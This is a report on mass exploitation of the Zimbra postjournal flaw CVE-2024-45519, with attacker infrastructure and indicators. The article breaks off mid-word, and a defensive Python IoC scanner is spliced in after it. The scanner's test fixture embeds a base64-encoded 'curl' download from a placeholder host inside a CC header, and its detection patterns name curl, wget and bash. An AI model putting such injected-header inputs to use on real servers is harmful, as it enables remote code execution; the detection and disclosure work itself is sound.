Cybercriminals Take Advantage of Major Zimbra Flaw by Utilizing CC’d Email Addresses

# Attackers Take Advantage of Severe Zimbra Mail Server Flaw: CVE-2024-45519

## Overview

Cybersecurity experts are alerting the public about the ongoing exploitation of a severe vulnerability in Zimbra mail servers, designated as **CVE-2024-45519**. This flaw permits attackers to execute arbitrary commands remotely on unpatched servers, potentially leading to the installation of backdoors and exposure of sensitive information. Zimbra, a widely used email and collaboration solution for medium and large enterprises, has released a patch to remediate the issue, but organizations that have yet to implement the update remain at risk.

This vulnerability is alarming because it can be triggered by sending a maliciously crafted email to a Zimbra server on which the **postjournal** service has been manually enabled by an administrator. Although this service is not enabled by default, which may reduce the number of vulnerable servers, the simplicity of the exploitation makes it a significant risk.

## How the Exploit Operates

The flaw exists within the **postjournal** service of Zimbra servers. When the service is enabled, attackers can send specially constructed emails to the server, and the service then executes attacker-supplied commands on the system. The method of attack is relatively straightforward: by sending harmful emails to an address on the Zimbra server, the perpetrator can trigger remote code execution (RCE) and potentially introduce a backdoor.

### Key Points:
– **Vulnerability ID**: CVE-2024-45519
– **Affected Product**: Zimbra email and collaboration server
– **Attack Vector**: Maliciously constructed emails sent to a Zimbra server with the postjournal service activated
– **Potential Impact**: Remote code execution, installation of backdoors, and further compromise of the server

Zimbra has issued a [security advisory](https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories) and provided a patch to fix the vulnerability. Organizations using Zimbra are strongly encouraged to implement the patch without delay or, at a minimum, disable the postjournal service if it is unnecessary.

## Initial Reports of Exploitation

On Tuesday, security researcher **Ivan Kwiatkowski** was the first to report active exploitation of the vulnerability in real-world scenarios. He described the attacks as “mass exploitation,” with harmful emails dispatched from the IP address **79.124.49[.]86**. The attack attempts to retrieve a file from the same IP address using the **curl** command, a tool frequently employed for transferring data to or from a server.

Researchers from **Proofpoint**, a premier cybersecurity firm, subsequently verified the report, noting that the attacks were opportunistic and geographically widespread. Though the exploitation attempts were extensive, they did not appear to be particularly sophisticated. The attackers used the same server to send the exploit emails and to host the second-stage payloads, suggesting they lack the distributed infrastructure often seen in more complex operations.

## Limited Impact So Far

In spite of the exploitation’s simplicity, researchers have identified that the overall impact of the attacks seems to be minimal. **Ron Bowes**, another security researcher, noted that the payload downloaded by the exploit “doesn’t actually do anything” — it just downloads a file to the server’s standard output (stdout) without running it. Bowes also reported that his honeypot server received approximately 500 requests within just one hour, implying that the attackers are actively probing for vulnerable servers.

Bowes clarified that the payload is not delivered directly through the malicious emails but is instead retrieved through a direct connection to the malicious server via **SMTP** (Simple Mail Transfer Protocol). This method of attack, while worrying, does not currently appear to have led to widespread infections or the deployment of ransomware or espionage malware.

## Insights from Proofpoint

In a communication sent on Wednesday, **Greg Lesnewich**, a researcher at Proofpoint, offered further insights into the ongoing exploitation efforts. He observed that while the attacks were indiscriminate in nature, the frequency of exploitation attempts remained relatively low. Lesnewich also highlighted that while the exploitation process is straightforward, its reliability remains uncertain.

Key insights from Proofpoint include:
– **Indiscriminate Targeting**: The attacks do not seem to be highly specific, and the exploitation efforts are spread across various regions.
– **Opportunistic Nature**: The attackers are likely searching for vulnerable servers to exploit as they come across them.
– **Limited Infrastructure**: The same server is employed to send exploit emails and host the second-stage payloads, revealing a lack of sophisticated resources.
– **Indicators of Compromise (IoCs)**: Defenders should keep an eye out for suspicious CC or To addresses in emails, in conjunction with outbound connections from Zimbra servers to remote IP addresses.

## Exploit Insights

According to Proofpoint, some of the malicious emails utilized various email addresses in the **CC** field, which were encoded using **base64**. Upon decoding and combining these addresses, they attempted to install a **webshell-based back
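As an added defensive example (not code from the article, from Proofpoint or from Zimbra), the script below shows how the two indicator patterns described above could be checked by a defender: it scans the To and CC headers of a message for shell-like content, both in the raw header and inside base64-looking runs that decode cleanly, and it flags outbound connections from a Zimbra host to destinations outside a trusted list. The sample message, the log lines, the host addresses (documentation and RFC 1918 ranges) and the regular expressions are all constructed assumptions; the connection-log line format is invented for the example and would need adapting to your own firewall or proxy logs.

```python
"""Added IoC-checking example for the Zimbra postjournal case.

Not from the article, Proofpoint or Zimbra. All sample data is constructed.
"""
import base64
import re
from email import message_from_string

# Tokens that should not appear in a legitimate mailbox local part.
SHELL_TOKENS = re.compile(r"[;|`$]|\$\(|\b(curl|wget|bash)\b")
# Runs of base64-alphabet characters long enough to be worth decoding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_runs(text):
    """Return the decoded text of every base64-looking run that decodes to ASCII."""
    decoded = []
    for match in B64_RUN.finditer(text):
        chunk = match.group(0).rstrip("=")
        chunk += "=" * (-len(chunk) % 4)  # restore padding
        try:
            decoded.append(base64.b64decode(chunk, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64, or not text
    return decoded


def scan_headers(raw_message):
    """Return (header, reason) for each To/Cc header that looks like injected input."""
    msg = message_from_string(raw_message)
    findings = []
    for header in ("To", "Cc"):
        for value in msg.get_all(header, []):
            if SHELL_TOKENS.search(value):
                findings.append((header, "shell metacharacters in raw header"))
            for text in decode_b64_runs(value):
                if SHELL_TOKENS.search(text):
                    findings.append((header, "base64 run decodes to shell-like text"))
                    break
    return findings


# Constructed log format (hypothetical): "<timestamp> OUT <src> -> <dst>:<port>"
CONN_LINE = re.compile(r"^\S+ OUT (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+)")


def flag_outbound(log_lines, zimbra_hosts, trusted_prefixes=("10.", "192.168.")):
    """Return (src, dst, port) for outbound connections from a Zimbra host
    to any destination that is not under a trusted prefix."""
    hits = []
    for line in log_lines:
        m = CONN_LINE.match(line)
        if not m or m["src"] not in zimbra_hosts:
            continue
        if m["dst"].startswith(trusted_prefixes):
            continue
        hits.append((m["src"], m["dst"], int(m["port"])))
    return hits


# --- constructed sample input ------------------------------------------------
CLEAN = (
    "From: alice@example.org\r\nTo: bob@example.org\r\n"
    "Cc: carol@example.org\r\nSubject: hi\r\n\r\nbody\r\n"
)
# A Cc local part carrying a base64-encoded, shell-like fragment (constructed;
# the IP is from the 203.0.113.0/24 documentation range).
FRAGMENT = base64.b64encode(b"curl http://203.0.113.5/x").decode()
SUSPECT = (
    "From: x@example.net\r\nTo: bob@example.org\r\n"
    f"Cc: <{FRAGMENT}@example.org>\r\nSubject: hi\r\n\r\nbody\r\n"
)
SAMPLE_LOG = [
    "2024-10-01T10:00:00Z OUT 10.0.0.5 -> 10.0.0.9:389",       # internal LDAP, ignored
    "2024-10-01T10:00:01Z OUT 10.0.0.5 -> 198.51.100.7:443",   # trusted mirror, ignored
    "2024-10-01T10:00:02Z OUT 10.0.0.5 -> 203.0.113.5:80",     # unexplained, flagged
    "2024-10-01T10:00:03Z OUT 10.0.0.20 -> 203.0.113.5:80",    # not a Zimbra host
]

if __name__ == "__main__":
    print("clean message:", scan_headers(CLEAN))
    print("suspect message:", scan_headers(SUSPECT))
    print("outbound hits:", flag_outbound(
        SAMPLE_LOG, {"10.0.0.5"}, trusted_prefixes=("10.", "192.168.", "198.51.100.")))
```

The header check deliberately looks at the raw header value rather than parsed addresses, because an injected local part may not parse as a valid address at all; the base64 path restores padding before decoding so that fragments split across several CC entries, as Proofpoint describes, can be decoded one run at a time. Any hit on a mail server that also shows an unexplained outbound connection in the same window is worth treating as a likely exploitation attempt and checking against the IP in the report.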